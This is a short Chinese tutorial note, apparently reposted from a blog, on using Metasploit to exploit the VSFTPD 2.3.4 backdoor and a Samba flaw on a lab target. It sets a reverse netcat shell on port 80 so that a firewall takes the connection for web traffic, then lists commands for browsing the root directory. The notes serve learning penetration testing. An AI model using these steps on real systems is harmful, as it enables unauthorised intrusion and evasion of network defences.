metasploit是rapid7开发的 www.rapid7.com 它是一个大型漏洞利用数据库,可以创造属于自己的漏洞 为了安全性检测,利用它和修补漏洞
parrot:msfconsole help use show set exploit 谷歌 rapid7 进入 vulnerability & Exploit Database 查询 VSFTPD v2.3.4 Backdoor Command Execution use 复制粘贴模块名字 show options set RHOST 靶机IP show options exploit uname -r uname -a ls谷歌 rapid7 进入 vulnerability & Exploit Database 查询到zenmap对应的samba模块 获取模块的信息
samba服务器运行它没有后门 唯一的方式是利用缓冲区溢出,使用有效载荷
use 复制粘贴模块名字 options set RHOST 靶机ip clear show payloads 选择 cmd/unix/reverse_netcat 复制 set payload 复制粘贴 options 设置自己的监听端口为80,靶机访问80端口防火墙会认为它在访问网站,让可疑程度降低 如果反向连接出来的端口是一个奇怪的数字,防火墙会阻止这个连接,说这个可疑 set LHOST 本机IP exploit uname -a ls cd /root ls cat vnc.logpureVPN赞助
从桌面光盘进去把VMware Tools拿到桌面解压 进去后右键运行终端
perl vmware-install.pl一切配置默认,注销后生效
转载于:https://www.cnblogs.com/sec875/p/11297011.html